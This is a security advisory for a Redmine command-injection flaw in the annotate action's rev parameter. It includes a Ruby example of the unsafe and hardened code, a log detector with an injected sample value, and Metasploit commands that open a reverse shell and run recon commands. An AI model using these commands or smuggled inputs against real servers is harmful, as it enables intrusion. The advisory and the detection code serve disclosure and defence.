Timeline :

Vulnerability submitted by joernchen to Redmine on 2010-12-18
Vulnerability advisory and new package provided by Redmine on 2010-12-23
Metasploit exploit released on 2010-12-24

    PoC provided by :

joernchen

    Reference(s) :

OSVDB-70090

    Affected version(s) :

All versions of Redmine prior to 1.0.5, 0.9.x versions included
redmine_1.0.4-1_all.deb on Debian Squeeze / Sid
redmine_1.0.4-1_all.deb on Ubuntu Lucid

    Tested on Ubuntu Lucid 10.04.1 LTS with :

CVS as SCM

    Description :

joernchen has reported a vulnerability, which could be classified as highly critical, in the project management web application Redmine; it could allow an attacker to compromise a vulnerable system.

The values submitted through the “rev” parameter of a Redmine project's “repository/annotate” action are not sanitized before being used. This flaw can be used to execute arbitrary code remotely on the vulnerable server.

The vulnerability mainly affects the bazaar, cvs, darcs and mercurial SCM adapters. The code is executed with the privileges of the user running the Redmine web application (for example www-data).

The vulnerability has been confirmed for all versions prior to 1.0.5. The vendor has released an update that corrects this vulnerability.
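As an added illustration of the flaw described above (example code written for this page, not Redmine's own code or its fix), the snippet below contrasts the unsafe shell-string construction with a hardened argv form guarded by revision validation, and adds a small access-log check that flags annotate requests whose rev value is not a plausible revision identifier. The REV_FORMAT pattern, the command shape and the sample log lines are assumptions constructed for the example.

```ruby
require 'uri'

# Assumption (not Redmine's code): what a legitimate revision identifier looks
# like for the affected adapters (CVS 1.2.3 style numbers, hex hashes, revnos).
REV_FORMAT = /\A[A-Za-z0-9][A-Za-z0-9._:-]*\z/

# Vulnerable pattern: the parameter is interpolated into one shell string, so
# shell metacharacters in +rev+ are parsed by /bin/sh instead of reaching cvs.
def annotate_command_unsafe(cvs_bin, path, rev)
  "#{cvs_bin} annotate -r #{rev} #{path}"
end

# Hardened pattern: reject anything that is not a revision identifier, then
# build an argv array. Passing an array to Open3/Process.spawn never invokes a
# shell, so +rev+ is always exactly one argument to the SCM binary.
def annotate_command_safe(cvs_bin, path, rev)
  raise ArgumentError, "invalid revision identifier: #{rev.inspect}" unless rev.match?(REV_FORMAT)
  [cvs_bin, 'annotate', '-r', rev, path]
end

# Detection: extract the rev parameter of repository/annotate requests from
# combined-format access log lines and flag values that fail REV_FORMAT.
ANNOTATE_REQ = %r{"(?:GET|POST) (\S*/repository/annotate\S*) HTTP/}

def flag_annotate_requests(log_lines)
  log_lines.each_with_object([]) do |line, flagged|
    m = ANNOTATE_REQ.match(line) or next
    uri = URI.parse(m[1])
    next if uri.query.nil?
    rev = URI.decode_www_form(uri.query).to_h['rev']
    flagged << { rev: rev, line: line.strip } if rev && !rev.match?(REV_FORMAT)
  end
end

# Constructed sample log lines (not from any real server) for a quick check.
SAMPLE_LOG = <<~LOG
10.0.0.5 - - [24/Dec/2010:10:01:02 +0100] "GET /redmine/projects/project2/repository/annotate/trunk/main.c?rev=1.4 HTTP/1.1" 200 5120
10.0.0.9 - - [24/Dec/2010:10:01:07 +0100] "GET /redmine/projects/project2/repository/annotate/trunk/main.c?rev=1.4%3Bid HTTP/1.1" 500 312
LOG

if __FILE__ == $0
  flag_annotate_requests(SAMPLE_LOG.lines).each do |f|
    puts "suspicious rev=#{f[:rev].inspect}: #{f[:line]}"
  end
end
```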

    Commands :

use exploit/unix/webapp/redmine_scm_exec
set RHOST 192.168.178.21
set URI /redmine/projects/project2/
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.178.21
exploit

id
uname -a
/sbin/ifconfig